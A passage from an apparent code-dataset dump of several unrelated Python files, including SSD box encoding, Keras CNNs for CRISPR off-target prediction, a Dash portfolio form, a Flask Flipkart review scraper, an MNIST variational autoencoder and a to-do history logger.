真实框与先验框重合部分的宽高、面积\n inter_wh = inter_rightbottom - inter_leftup\n inter_wh = np.maximum(inter_wh, 0)\n inter = inter_wh[:, 0] * inter_wh[:, 1]\n # 真实框的面积\n area_true = (box[2] - box[0]) * (box[3] - box[1])\n # 先验框的面积\n area_anchor = (self.anchors[:, 2] - self.anchors[:, 0]) * (self.anchors[:, 3] - self.anchors[:, 1])\n # 计算iou\n union = area_true + area_anchor - inter\n iou = inter / union\n return iou\n\n def encode_box(self, box, return_iou=True, variances=(0.1, 0.1, 0.2, 0.2)):\n \"\"\"\n 计算当前真实框和先验框的重合情况\n \"\"\"\n # iou shape: (num_anchors, ) 每个值代表每个anchor与当前box的iou值\n iou = self.iou(box)\n # encoded_box shape: (num_anchors, 4+1/0)\n # 4+1/0 : 前面4个表示真实要学习的回归参数,最后一个表示正样本anchor与当前真实框的iou值\n encoded_box = np.zeros((self.num_anchors, 4 + return_iou))\n\n # 找到当前真实框重合程度较高的先验框\n assign_mask = iou > self.overlap_threshold\n\n # 如果没有一个先验框重合度大于self.overlap_threshold,则选择重合度最大的为正样本\n if not assign_mask.any():\n assign_mask[iou.argmax()] = True\n\n # 如果返回iou为True的话,将匹配到的正样本anchor的最后一个位置设置为iou值\n if return_iou:\n encoded_box[:, -1][assign_mask] = iou[assign_mask]\n\n # 获取正样本anchors\n assigned_anchors = self.anchors[assign_mask]\n # 计算真实框box的中心和宽高\n box_center = 0.5 * (box[:2] + box[2:])\n box_wh = box[2:] - box[:2]\n # 计算先验框anchor的中心和宽高\n assigned_anchors_center = (assigned_anchors[:, 0:2] + assigned_anchors[:, 2:4]) * 0.5\n assigned_anchors_wh = assigned_anchors[:, 2:4] - assigned_anchors[:, 0:2]\n\n # 根据真实框和先验框计算每个先验框要学习的回归参数信息,variances表示对中心和宽高赋予不同权重\n encoded_box[:, :2][assign_mask] = box_center - assigned_anchors_center\n encoded_box[:, :2][assign_mask] /= assigned_anchors_wh\n encoded_box[:, :2][assign_mask] /= np.array(variances)[:2]\n\n encoded_box[:, 2:4][assign_mask] = np.log(box_wh / assigned_anchors_wh)\n encoded_box[:, 2:4][assign_mask] /= np.array(variances)[2:4]\n\n # 展平后返回,shape:(num_anchors * (4+1/0), )\n return encoded_box.ravel()\n\n def assigin_boxer(self, boxes):\n \"\"\"\n assignment分为3个部分\n - :4 为网络应该有的回归预测结果\n - 4:-1 为先验框所对应的种类,默认为背景\n - -1 为当前先验框是否包含目标\n \"\"\"\n # assignment shape: (num_anchors, 4+21+1)\n assignment = np.zeros((self.num_anchors, 4 + self.num_classes + 1))\n # 初始时每个先验框anchor的背景概率为1\n assignment[:, 4] = 1.0\n if len(boxes) == 0:\n return assignment\n\n # 对每一个真实框都进行iou计算,并对每个真实框匹配到正样本进行编码处理(即计算其回归参数)\n encoded_boxes = np.apply_along_axis(self.encode_box, 1, boxes[:, :4])\n # reshape后,获得的encoded_boxes的shape为:(num_true_box, num_anchors, 4+1),4对应回归参数、1为iou\n encoded_boxes = encoded_boxes.reshape(-1, self.num_anchors, 5)\n\n # 求取每一个先验框重合度最大的真实框\n # best_iou : (num_anchors,) 其值为anchor与box的最大iou值\n # best_iou_idx: (num_anchors,) 其值为anchor与box最大iou值box的索引\n best_iou = encoded_boxes[:, :, -1].max(axis=0)\n best_iou_idx = encoded_boxes[:, :, -1].argmax(axis=0)\n # 保证每一个真实框都有对应的先验框进行匹配,求取每一个真实框重合度最大的先验框\n # box_iou: (num_true_box, ), 其值为box与anchor的最大iou值\n # box_iou_idx: (num_true_box,),其值为box与anchor最大iou值的anchor的索引\n box_iou = encoded_boxes[:, :, -1].max(axis=1)\n box_iou_idx = encoded_boxes[:, :, -1].argmax(axis=1)\n for i in range(len(box_iou_idx)):\n best_iou_idx[box_iou_idx[i]] = i\n best_iou[box_iou_idx[i]] = box_iou[i]\n\n # best_iou_mask: (num_anchors,) 其值是bool,最大iou值大于0为True,反之为False\n best_iou_mask = best_iou > 0\n best_iou_idx = best_iou_idx[best_iou_mask]\n\n # 设置正样本的\n assignment[:, :4][best_iou_mask] = encoded_boxes[best_iou_idx, best_iou_mask, :4]\n # 将正样本的背景概率设置为0\n assignment[:, 4][best_iou_mask] = 0\n # 设置正样本的标签\n assignment[:, 5:-1][best_iou_mask] = boxes[best_iou_idx, 4:]\n # 设置正样本含有物体\n assignment[:, -1][best_iou_mask] = 1\n return assignment\n\n\ndef ssd_dataset_collate(batch):\n images = []\n bboxes = []\n for img, box in batch:\n images.append(img)\n bboxes.append(box)\n images = np.array(images)\n bboxes = np.array(bboxes)\n return images, bboxes","repo_name":"codecat0/CV","sub_path":"Object_Detection/SSD/dataset/ssd_dataset.py","file_name":"ssd_dataset.py","file_ext":"py","file_size_in_byte":11955,"program_lang":"python","lang":"en","doc_type":"code","stars":140,"dataset":"github-code","pt":"31"} +{"seq_id":"74986962648","text":"\"\"\"Convolutional Neural Networks.\n===============================================\nVersion |Date |  Author|  Comment\n-----------------------------------------------\n0.0 | 31 Oct 2020 | J. Charlier | initial version\n0.1 | 11 Nov 2020 | J. Charlier | bug update for 8x23 encoding\n===============================================\n\"\"\"\n#\n#\nimport numpy as np\nimport tensorflow as tf\nfrom keras.utils import to_categorical\n#import tensorflow.python.keras as tfkeras\nfrom tensorflow.keras.losses import categorical_crossentropy\nfrom tensorflow.python.keras import backend as K\nfrom tensorflow.python.keras import (models, layers)\nfrom tensorflow.python.keras.models import Sequential, Model\nfrom tensorflow.python.keras.layers import (\n Conv2D, MaxPooling2D, MaxPool2D,\n concatenate, BatchNormalization, \n Dense, Dropout, Flatten, Input)\nimport matplotlib.pyplot as plt\np = print\nflpath = 'drive/My Drive/crispor/models/'\n#\n#\ndef transformImages(\n xtrain, xtest,\n ytrain, ytest,\n imgrows, imgcols,\n num_classes):\n if K.image_data_format() == 'channels_first':\n xtrain = xtrain.reshape(xtrain.shape[0], 1, imgrows, imgcols)\n xtest = xtest.reshape(xtest.shape[0], 1, imgrows, imgcols)\n input_shape = (1, imgrows, imgcols)\n else:\n xtrain = xtrain.reshape(xtrain.shape[0], imgrows, imgcols, 1)\n xtest = xtest.reshape(xtest.shape[0], imgrows, imgcols, 1)\n input_shape = (imgrows, imgcols, 1)\n xtrain = xtrain.astype('float32')\n xtest = xtest.astype('float32')\n xtrain /= 255\n xtest /= 255\n p('xtrain shape:', xtrain.shape)\n p(xtrain.shape[0], 'train samples')\n p(xtest.shape[0], 'test samples')\n #\n # convert class vectors to binary class matrices\n ytrain = to_categorical(ytrain, num_classes)\n ytest = to_categorical(ytest, num_classes)\n return xtrain, xtest, ytrain, ytest, input_shape\n#\n#\ndef cnnthree(\n xtrain, ytrain,\n xtest, ytest,\n input_shape, num_classes,\n batch_size, epochs,\n callbacks,\n ismodelsaved=False,\n tl=False):\n if ismodelsaved == False:\n cnn3 = Sequential()\n cnn3.add(\n Conv2D(\n 32,\n kernel_size=(3, 3),\n activation='relu',\n input_shape=input_shape\n )\n )\n cnn3.add(MaxPooling2D(pool_size=(2, 2)))\n cnn3.add(Dropout(0.25))\n cnn3.add(Flatten())\n cnn3.add(Dense(128, activation='relu'))\n cnn3.add(Dropout(0.5))\n cnn3.add(Dense(num_classes, activation='softmax'))\n #\n cnn3.compile(\n loss=categorical_crossentropy,\n optimizer=tf.keras.optimizers.RMSprop(0.001, rho=0.9),\n metrics=['accuracy']\n )\n #\n history_cnn3 = cnn3.fit(\n xtrain, ytrain,\n batch_size=batch_size,\n epochs=epochs,\n verbose=0,\n validation_data=(xtest, ytest),\n callbacks=callbacks\n )\n score = cnn3.evaluate(xtest, ytest, verbose=0)\n print('Test loss:', score[0])\n print('Test accuracy:', score[1])\n #\n if True:\n plt.figure()\n plt.plot(history_cnn3.history['loss'], label='train loss')\n plt.plot(history_cnn3.history['val_loss'], label='test loss')\n plt.title('Learning Curves')\n plt.xlabel('epochs')\n plt.ylabel('loss')\n plt.legend()\n plt.show()\n else:\n if np.cumprod(input_shape)[-1] == 92:\n cnn3 = tf.keras.models.load_model(\n flpath+'saved_model_4x23/cnn3_4x23'\n )\n else:\n if tl:\n cnn3 = tf.keras.models.load_model(\n flpath+'saved_model_guideseq_8x23/cnn3_8x23'\n )\n else:\n cnn3 = tf.keras.models.load_model(\n flpath+'saved_model_crispr_8x23/cnn3crispr_8x23'\n )\n p(\"CNN3: Done\")\n return cnn3\n#\n#\ndef cnnfive(\n xtrain, ytrain,\n xtest, ytest,\n input_shape, num_classes,\n batch_size, epochs,\n callbacks,\n ismodelsaved=False,\n tl=False):\n if ismodelsaved == False:\n # model definition\n cnn5 = Sequential()\n cnn5.add(\n Conv2D(\n 32,\n kernel_size=(3, 3),\n activation='relu',\n input_shape=input_shape\n )\n )\n cnn5.add(Conv2D(64, (1, 1), activation='relu'))\n cnn5.add(MaxPooling2D(pool_size=(2, 2)))\n cnn5.add(Dropout(0.25))\n cnn5.add(Flatten())\n cnn5.add(Dense(128, activation='relu'))\n cnn5.add(Dropout(0.5))\n cnn5.add(Dense(num_classes, activation='softmax'))\n #\n cnn5.compile(\n loss=categorical_crossentropy,\n optimizer=tf.keras.optimizers.RMSprop(0.001, rho=0.9),\n metrics=['accuracy']\n )\n #\n history_cnn5layers = cnn5.fit(\n xtrain, ytrain,\n batch_size=batch_size,\n epochs=epochs,\n verbose=0,\n validation_data=(xtest, ytest),\n callbacks=callbacks\n )\n score = cnn5.evaluate(xtest, ytest, verbose=0)\n print('Test loss:', score[0])\n print('Test accuracy:', score[1])\n #\n if True:\n plt.figure()\n plt.plot(history_cnn5layers.history['loss'], label='train loss')\n plt.plot(history_cnn5layers.history['val_loss'], label='test loss')\n plt.title('Learning Curves')\n plt.xlabel('epochs')\n plt.ylabel('loss')\n plt.legend()\n plt.show()\n else:\n if np.cumprod(input_shape)[-1] == 92:\n cnn5 = tf.keras.models.load_model(\n flpath+'saved_model_4x23/cnn5_4x23'\n )\n else:\n if tl:\n cnn5 = tf.keras.models.load_model(\n flpath+'saved_model_guideseq_8x23/cnn5_8x23'\n )\n else:\n cnn5 = tf.keras.models.load_model(\n flpath+'saved_model_crispr_8x23/cnn5crispr_8x23'\n )\n p(\"CNN5: Done\")\n return cnn5\n#\n#\ndef cnnten(\n xtrain, ytrain,\n xtest, ytest,\n input_shape, num_classes,\n batch_size, epochs,\n callbacks,\n ismodelsaved=False,\n tl=False):\n if ismodelsaved == False:\n # model definition\n cnn10 = Sequential()\n cnn10.add(\n Conv2D(\n 32,\n kernel_size=(1, 1),\n padding=\"same\",\n activation='relu',\n input_shape=input_shape\n )\n )\n cnn10.add(MaxPooling2D(pool_size=(2, 2)))\n cnn10.add(Conv2D(64, (1, 1), padding=\"same\", activation='relu'))\n cnn10.add(MaxPooling2D(pool_size=(2, 2)))\n cnn10.add(Dropout(0.25))\n cnn10.add(Flatten())\n cnn10.add(Dense(128, activation='relu'))\n cnn10.add(Dropout(0.5))\n cnn10.add(Dense(64, activation='relu'))\n cnn10.add(Dropout(0.5))\n cnn10.add(Dense(num_classes, activation='softmax'))\n #\n #\n cnn10.compile(\n loss=categorical_crossentropy,\n optimizer=tf.keras.optimizers.RMSprop(0.001, rho=0.9),\n metrics=['accuracy']\n )\n #\n history_cnn10layers = cnn10.fit(\n xtrain, ytrain,\n batch_size=batch_size,\n epochs=100,\n verbose=0,\n validation_data=(xtest, ytest),\n callbacks=callbacks\n )\n score = cnn10.evaluate(xtest, ytest, verbose=0)\n print('Test loss:', score[0])\n print('Test accuracy:', score[1])\n #\n if True:\n plt.figure()\n plt.plot(history_cnn10layers.history['loss'], label='train loss')\n plt.plot(history_cnn10layers.history['val_loss'], label='test loss')\n plt.title('Learning Curves')\n plt.xlabel('epochs')\n plt.ylabel('loss')\n plt.legend()\n plt.show()\n else:\n if np.cumprod(input_shape)[-1] == 92:\n cnn10 = tf.keras.models.load_model(\n flpath+'saved_model_4x23/cnn10_4x23'\n )\n else:\n if tl:\n cnn10 = tf.keras.models.load_model(\n flpath+'saved_model_guideseq_8x23/cnn10_8x23'\n )\n else:\n cnn10 = tf.keras.models.load_model(\n flpath+'saved_model_crispr_8x23/cnn10crispr_8x23'\n )\n p(\"CNN10: Done\")\n return cnn10\n#\n#\ndef cnnlin(\n xtrain, ytrain,\n xtest, ytest,\n input_shape, num_classes,\n batch_size, epochs,\n callbacks,\n ismodelsaved=False,\n tl=False):\n if ismodelsaved == False:\n inputs = Input(shape=input_shape, name='main_input')\n conv_1 = Conv2D(10, (1,1), padding='same', activation='relu')(inputs)\n conv_2 = Conv2D(10, (1,2), padding='same', activation='relu')(inputs)\n conv_3 = Conv2D(10, (1,3), padding='same', activation='relu')(inputs)\n conv_4 = Conv2D(10, (1,5), padding='same', activation='relu')(inputs)\n #\n conv_output = concatenate([conv_1, conv_2, conv_3, conv_4])\n bn_output = BatchNormalization()(conv_output)\n pooling_output = MaxPool2D(pool_size=(1,5), strides=None, padding='valid')(bn_output)\n flatten_output = Flatten()(pooling_output)\n #\n x = Dense(100, activation='relu')(flatten_output)\n x = Dense(23, activation='relu')(x)\n x = Dropout(0.15)(x)\n predictions = Dense(num_classes, name='main_output')(x)\n #\n cnnlin = Model(inputs, predictions)\n adamopt = tf.keras.optimizers.Adam(lr=1e-4)\n cnnlin.compile(\n loss='binary_crossentropy', \n optimizer=adamopt,\n metrics=['accuracy']\n )\n #\n history_cnnreplica = cnnlin.fit(\n xtrain, ytrain,\n batch_size=batch_size,\n epochs=20,\n verbose=1,\n validation_data=(xtest, ytest)\n )\n #\n if True:\n plt.figure()\n plt.plot(history_cnnreplica.history['loss'], label='train loss')\n plt.plot(history_cnnreplica.history['val_loss'], label='test loss')\n plt.title('Learning Curves')\n plt.xlabel('epochs')\n plt.ylabel('loss')\n plt.legend()\n plt.show()\n else:\n if np.cumprod(input_shape)[-1] == 92:\n cnnlin = tf.keras.models.load_model(\n flpath+'saved_model_4x23/cnnlinn_4x23'\n )\n else:\n if tl:\n cnnlin = tf.keras.models.load_model(\n flpath+'saved_model_guideseq_8x23/cnnlinn_8x23'\n )\n else:\n cnnlin = tf.keras.models.load_model(\n flpath+'saved_model_crispr_8x23/cnnlinncrispr_8x23'\n )\n p(\"CNN Lin: Done\")\n return cnnlin\n#\n# Last card of module cnns.\n#\n","repo_name":"dagrate/dl-offtarget","sub_path":"experiments/cnns.py","file_name":"cnns.py","file_ext":"py","file_size_in_byte":11170,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"31"} +{"seq_id":"24515009009","text":"import dash_bootstrap_components as dbc\nfrom dash import dcc\nfrom dash import html\nfrom dash import dash_table\n\nfrom backend.Portfolio import Ticker\nimport json\nimport pandas as pd\n\n\ndef New_Portfolio(pdb, initial=False):\n\n sectors = pdb.sectors\n currencies = pdb.currencies\n\n # options for the sector Dropdown\n sector_options = []\n for k,v in sectors.items():\n if k!='_id':\n sector_options.append( { 'label':f\"{v} ({k})\",'value':k } )\n \n # options for the currency Dropdown\n currency_options = []\n for k,v in currencies.items():\n if k!='_id':\n currency_options.append( { 'label':v,'value':v } )\n\n # initialize the variable in case of a new portfolio\n initial_portfolio = None\n initial_name = 'portfolio-01'\n initial_df = pd.DataFrame(columns=list(Ticker().dict.keys()))\n\n # in case of editing an existing portfolio load the current data of the portfolio\n if initial:\n initial_name = pdb.current_portfolio.name\n initial_df = pdb.current_portfolio.dataframe_representation()\n initial_portfolio = []\n for ticker in pdb.current_portfolio.tickers:\n initial_portfolio.append(ticker.dict)\n \n body = dbc.Container(\n [\n dbc.Row(\n [\n dbc.Col(\n [\n html.P(\"Add ticker\"),\n html.P(\"Ticker (Yahoo Finance)\"),\n dbc.Input(id='input-ticker-name'),\n html.P(\"Shares\"),\n dbc.Input(id='input-ticker-shares'),\n html.P(\"Currency\"),\n dcc.Dropdown(\n id='dropdown-ticker-currency',\n options=currency_options,\n value='',\n placeholder=\"Select a currency\"\n ),\n html.P(\"Sector\"),\n dcc.Dropdown(\n id='dropdown-ticker-sector',\n options=sector_options,\n value='',\n placeholder=\"Select an asset class\"\n ),\n dbc.Button(\n \"add / remove\",\n id='button-add_remove',\n ),\n ]),\n dbc.Col(\n [\n html.P(\"Name\"),\n dbc.Input(\n id='input-portfolio_name',\n value=initial_name,\n disabled=True,\n ),\n dbc.Button(\n \"save portfolio\",\n id='button-save_portfolio',\n disabled=True,\n ),\n \n html.Center(\n [\n html.Div(id='table-new_portfolio',\n children=dash_table.DataTable(data=initial_df .to_dict('records'), columns=[{\"name\": i, \"id\": i} for i in initial_df .columns], fill_width=True)\n )\n ]),\n dcc.Store(\n id='storage-temporary-portfolio',\n data=json.dumps(initial_portfolio),\n ),\n html.Div(id=\"portfolio-change\"),\n ]\n ),\n ]\n ),\n ]\n )\n\n layout = html.Div([\n body\n ])\n \n return layout\n \n\n \n","repo_name":"andreariba/Portfolio_app","sub_path":"apps/add_portfolio.py","file_name":"add_portfolio.py","file_ext":"py","file_size_in_byte":3062,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"72989656409","text":"import ast\nimport os\n\nfrom flask import Flask, render_template, request, jsonify\nfrom flask_cors import CORS, cross_origin\nimport requests\nfrom bs4 import BeautifulSoup as bS\nfrom urllib.request import urlopen as uReq\nimport json\n\napp = Flask(__name__)\n\n\n@app.route('/', methods=['GET']) # route to display the home page\n@cross_origin()\ndef homepage():\n return render_template(\"index.html\")\n\n@app.route('/products', methods=['POST', 'GET']) # route to display the product page\n@cross_origin()\ndef index():\n if request.method == 'POST':\n try:\n searchstring = request.form['content'].replace(\" \", \"%20\")\n flipkart_url = \"https://www.flipkart.com/search?q=\" + searchstring\n uclient = uReq(flipkart_url)\n flipkartpage = uclient.read()\n uclient.close()\n flipkart_html = bS(flipkartpage, \"html.parser\")\n bigboxes = flipkart_html.findAll(\"div\", {\"class\": \"bhgxx2 col-12-12\"})\n\n del bigboxes[0:3]\n del bigboxes[-5:]\n alldata = {}\n\n for boxes in bigboxes:\n\n productname = boxes.find(\"div\", {\"class\": \"_3wU53n\"})\n productLinks = \"https://www.flipkart.com\" + boxes.div.div.div.a['href']\n alldata[productname.text] = productLinks\n with open('url.txt', 'w') as file: #dumping the url dict in a txt file\n file.write(json.dumps(alldata))\n\n return render_template(\"links.html\", alldata = alldata)\n except Exception as e:\n print('The Exception message is: ', e)\n return 'something is wrong'\n return render_template(\"links.html\")\n else:\n return render_template(\"index.html\")\n\n\n\n@app.route('/review/', methods=['POST', 'GET']) # route to show the review comments in a web UI\n@cross_origin()\ndef review(product):\n try:\n file = open(\"url.txt\", \"r\")\n contents = file.read()\n dictionary = ast.literal_eval(contents)\n productlink = dictionary[product]\n prodRes = requests.get(productlink)\n prodRes.encoding = 'utf-8'\n prod_html = bS(prodRes.text, \"html.parser\")\n print(prod_html)\n commentboxes = prod_html.find_all('div', {'class': \"_3nrCtb\"})\n reviews = []\n for commentbox in commentboxes:\n try:\n # name.encode(encoding='utf-8')\n name = commentbox.div.div.find_all('p', {'class': '_3LYOAd _3sxSiS'})[0].text\n except:\n name = 'No Name'\n try:\n # rating.encode(encoding='utf-8')\n rating = commentbox.div.div.div.div.text\n except:\n rating = 'No Rating'\n try:\n # commentHead.encode(encoding='utf-8')\n commentHead = commentbox.div.div.div.p.text\n except:\n commentHead = 'No Comment Heading'\n try:\n comtag = commentbox.div.div.find_all('div', {'class': ''})\n # custComment.encode(encoding='utf-8')\n custComment = comtag[0].div.text\n\n except Exception as e:\n print(\"Exception while creating dictionary: \", e)\n mydict = {\"Product\": product, \"Name\": name, \"Rating\": rating, \"CommentHead\": commentHead,\n \"Comment\": custComment}\n reviews.append(mydict)\n return render_template('results.html', reviews=reviews[0:(len(reviews) - 1)])\n except Exception as e:\n print('The Exception message is: ', e)\n return 'something is wrong'\n return render_template('results.html')\n\n\nport = int(os.getenv(\"PORT\"))\nif __name__ == \"__main__\":\n #app.run(host='0.0.0.0', port=5000)\n app.run(host='0.0.0.0', port=port)\n # app.run(host='127.0.0.1', port=8001, debug=True)\n","repo_name":"mahesh9661/FlipkartReviewScrapper","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4008,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"22833022042","text":"import numpy as np\nimport tensorflow as tf\nimport os, sys, inspect\nimport tensorflow.examples.tutorials.mnist as mnist\nimport pandas as pd\n\nutils_folder = os.path.realpath(\n os.path.abspath(os.path.join(os.path.split(inspect.getfile(inspect.currentframe()))[0], \"..\")))\nif utils_folder not in sys.path:\n sys.path.insert(0, utils_folder)\n\nimport TensorflowUtils as utils\n\nFLAGS = tf.flags.FLAGS\ntf.flags.DEFINE_integer(\"z_dim\", \"3\", \"Latent variable dimension\")\ntf.flags.DEFINE_integer(\"batch_size\", \"256\", \"Train batch size\")\ntf.flags.DEFINE_string(\"logs_dir\", \"logs/MNIST_VAE_logs/\", \"Path to logs dir\")\ntf.flags.DEFINE_string(\"activation\", \"relu\", \"Activation function to use in network\")\ntf.flags.DEFINE_float(\"regularization\", \"1e-5\", \"Regularization multiplier value\")\ntf.flags.DEFINE_float(\"learning_rate\", \"1e-3\", \"Learning rate\")\n\nIMAGE_SIZE = 28\nMAX_ITERATIONS = int(1 + 1e5)\nLEARNING_RATE = FLAGS.learning_rate\nNUM_LABELS = 10\n\n\ndef activation_function(x, name=\"\"):\n activation_dict = {'relu': tf.nn.relu(x, name), 'elu': tf.nn.elu(x, name), 'lrelu': utils.leaky_relu(x, 0.2, name),\n 'tanh': tf.nn.tanh(x, name),\n 'sigmoid': tf.nn.sigmoid(x, name)}\n act = activation_dict[FLAGS.activation]\n utils.add_activation_summary(act)\n return act\n\n\ndef encoder_fc(images):\n with tf.variable_scope(\"encoder\") as scope:\n W_fc1 = utils.weight_variable([IMAGE_SIZE * IMAGE_SIZE, 50], name=\"W_fc1\")\n b_fc1 = utils.bias_variable([50], name=\"b_fc1\")\n h_relu1 = activation_function(tf.matmul(images, W_fc1) + b_fc1, name=\"hfc_1\")\n\n W_fc2 = utils.weight_variable([50, 50], name=\"W_fc2\")\n b_fc2 = utils.bias_variable([50], name=\"b_fc2\")\n h_relu2 = activation_function(tf.matmul(h_relu1, W_fc2) + b_fc2, name=\"hfc_2\")\n\n W_fc3 = utils.weight_variable([50, FLAGS.z_dim], name=\"W_fc3\")\n b_fc3 = utils.bias_variable([FLAGS.z_dim], name=\"b_fc3\")\n mu = tf.add(tf.matmul(h_relu2, W_fc3), b_fc3, name=\"mu\")\n utils.add_activation_summary(mu)\n\n W_fc4 = utils.weight_variable([50, FLAGS.z_dim], name=\"W_fc4\")\n b_fc4 = utils.bias_variable([FLAGS.z_dim], name=\"b_fc4\")\n log_var = tf.add(tf.matmul(h_relu2, W_fc4), b_fc4, name=\"log_var\")\n utils.add_activation_summary(log_var)\n\n return mu, log_var\n\n\ndef decoder_fc(z):\n with tf.variable_scope(\"decoder\") as scope:\n Wd_fc1 = utils.weight_variable([FLAGS.z_dim, 50], name=\"Wd_fc1\")\n bd_fc1 = utils.bias_variable([50], name=\"bd_fc1\")\n hd_relu1 = activation_function(tf.matmul(z, Wd_fc1) + bd_fc1, name=\"hdfc_1\")\n\n Wd_fc2 = utils.weight_variable([50, 50], name=\"Wd_fc2\")\n bd_fc2 = utils.bias_variable([50], name=\"bd_fc2\")\n hd_relu2 = activation_function(tf.matmul(hd_relu1, Wd_fc2) + bd_fc2, name=\"hdfc_2\")\n\n Wd_fc3 = utils.weight_variable([50, IMAGE_SIZE * IMAGE_SIZE], name=\"Wd_fc3\")\n bd_fc3 = utils.bias_variable([IMAGE_SIZE * IMAGE_SIZE], name=\"bd_fc3\")\n pred_image = tf.matmul(hd_relu2, Wd_fc3) + bd_fc3\n return pred_image\n\n\ndef train(loss_val, var_list):\n optimizer = tf.train.AdamOptimizer(FLAGS.learning_rate)\n grads = optimizer.compute_gradients(loss_val, var_list=var_list)\n for grad, var in grads:\n utils.add_gradient_summary(grad, var)\n return optimizer.apply_gradients(grads)\n\n\ndef main(argv=None):\n data = mnist.input_data.read_data_sets(\"MNIST_data\", one_hot=False)\n images = tf.placeholder(tf.float32, shape=[None, IMAGE_SIZE * IMAGE_SIZE], name=\"input_image\")\n tf.image_summary(\"Input\", tf.reshape(images, [-1, IMAGE_SIZE, IMAGE_SIZE, 1]), max_images=2)\n\n mu, log_var = encoder_fc(images)\n epsilon = tf.random_normal(tf.shape(mu), name=\"epsilon\")\n z = mu + tf.mul(tf.exp(log_var * 0.5), epsilon)\n\n pred_image = decoder_fc(z)\n entropy_loss = tf.reduce_sum(\n tf.nn.sigmoid_cross_entropy_with_logits(pred_image, images, name=\"entropy_loss\"), reduction_indices=1)\n tf.histogram_summary(\"Entropy_loss\", entropy_loss)\n pred_image_sigmoid = tf.nn.sigmoid(pred_image)\n tf.image_summary(\"Output\", tf.reshape(pred_image_sigmoid, [-1, IMAGE_SIZE, IMAGE_SIZE, 1]), max_images=2)\n\n KL_loss = -0.5 * tf.reduce_sum(1 + log_var - tf.pow(mu, 2) - tf.exp(log_var), reduction_indices=1)\n tf.histogram_summary(\"KL_Divergence\", KL_loss)\n\n train_variables = tf.trainable_variables()\n for v in train_variables:\n utils.add_to_regularization_and_summary(var=v)\n\n reg_loss = tf.add_n(tf.get_collection(\"reg_loss\"))\n tf.scalar_summary(\"Reg_loss\", reg_loss)\n total_loss = tf.reduce_mean(KL_loss + entropy_loss) + FLAGS.regularization * reg_loss\n tf.scalar_summary(\"total_loss\", total_loss)\n train_op = train(total_loss, train_variables)\n\n sess = tf.Session()\n summary_op = tf.merge_all_summaries()\n saver = tf.train.Saver()\n summary_writer = tf.train.SummaryWriter(FLAGS.logs_dir, sess.graph)\n\n sess.run(tf.initialize_all_variables())\n ckpt = tf.train.get_checkpoint_state(FLAGS.logs_dir)\n if ckpt and ckpt.model_checkpoint_path:\n saver.restore(sess, ckpt.model_checkpoint_path)\n print (\"Model restored...\")\n\n for itr in xrange(MAX_ITERATIONS):\n batch_images, batch_labels = data.train.next_batch(FLAGS.batch_size)\n sess.run(train_op, feed_dict={images: batch_images})\n\n if itr % 500 == 0:\n entr_loss, KL_div, tot_loss, summary_str = sess.run([entropy_loss, KL_loss, total_loss, summary_op],\n feed_dict={images: batch_images})\n print (\n \"Step: %d, Entropy loss: %g, KL Divergence: %g, Total loss: %g\" % (itr, np.mean(entr_loss), np.mean(KL_div), tot_loss))\n summary_writer.add_summary(summary_str, itr)\n\n if itr % 1000 == 0:\n saver.save(sess, FLAGS.logs_dir + \"model.ckpt\", global_step=itr)\n\n def test():\n z_vec = sess.run(z, feed_dict={images: data.test.images})\n write_array = np.hstack((z_vec, np.reshape(data.test.labels, (-1, 1))))\n df = pd.DataFrame(write_array)\n df.to_csv(\"z_vae_output.csv\", header=False, index=False)\n\n test()\n\n\nif __name__ == \"__main__\":\n tf.app.run()\n","repo_name":"shekkizh/TensorflowProjects","sub_path":"Unsupervised_learning/MNIST_VAE.py","file_name":"MNIST_VAE.py","file_ext":"py","file_size_in_byte":6242,"program_lang":"python","lang":"en","doc_type":"code","stars":169,"dataset":"github-code","pt":"31"} +{"seq_id":"27692415411","text":"import os\nfrom datetime import datetime\nfrom pathlib import Path\n\nclass HistoryList:\n current_script_path = os.path.dirname(os.path.realpath(__file__))\n dev_script_path = \"/Users/bradley/Personal Projects/todo/src\"\n dev_history_path = \"./resources/history.txt\"\n live_history_path = \"/Users/bradley/bin/history.txt\"\n\n if current_script_path == dev_script_path:\n history_path = dev_history_path\n else:\n history_path = live_history_path\n\n if not Path(history_path).exists():\n file = open(history_path, \"w\")\n file.close()\n\n @classmethod\n def show(cls) -> None:\n with open(cls.history_path, \"r\") as todo_list:\n print(\"\\n#################\\n### HISTORY ###\\n#################\\n\")\n all_items = todo_list.readlines()\n for i in range(len(all_items)):\n formatted_item = all_items[i].strip()\n print(formatted_item)\n print(\"\\n\")\n\n @classmethod\n def add(cls, item: str, action: str) -> None:\n \"\"\"\n :param item: String, line to add to list.\n :param action: String, Action taken, ADDED, REMOVED, AMENDED.\n \"\"\"\n now = datetime.now()\n dt_string = now.strftime(\"%d/%m/%Y %H:%M:%S\")\n with open(cls.history_path, \"a\") as todo_list:\n todo_list.write(dt_string + \" \" + action.upper() + \" \\\"\" + item + \"\\\"\\n\")\n","repo_name":"brabli/todo-list","sub_path":"src/HistoryList.py","file_name":"HistoryList.py","file_ext":"py","file_size_in_byte":1388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"29677697364","text":"import weakref\n\nfrom rcl_interfaces.msg import ParameterDescriptor\nfrom rcl_interfaces.msg import ParameterType\n\nfrom rclpy.impl.implementation_singleton import rclpy_implementation as _rclpy\nfrom rclpy.parameter import Parameter\nfrom rclpy.qos import qos_profile_services_default\nfrom rclpy.service import Service\nfrom rclpy.type_support import check_is_valid_srv_type\nfrom rclpy.validate_topic_name import TOPIC_SEPARATOR_STRING\n\nfrom type_description_interfaces.srv import GetTypeDescription\n\nSTART_TYPE_DESCRIPTION_SERVICE_PARAM = 'start_type_description_service'\n\n\nclass TypeDescriptionService:\n \"\"\"\n Optionally initializes and contains the ~/get_type_description service.\n\n The service is implemented in rcl, but should be enabled via parameter and have its\n callbacks handled via end-client execution framework, such as callback groups and waitsets.\n\n This is not intended for use by end users, rather it is a component to be used by Node.\n \"\"\"\n\n def __init__(self, node):\n \"\"\"Initialize the service, if the parameter is set to true.\"\"\"\n self._node_weak_ref = weakref.ref(node)\n node_name = node.get_name()\n self.service_name = TOPIC_SEPARATOR_STRING.join((node_name, 'get_type_description'))\n self._type_description_srv = None\n\n self.enabled = False\n if not 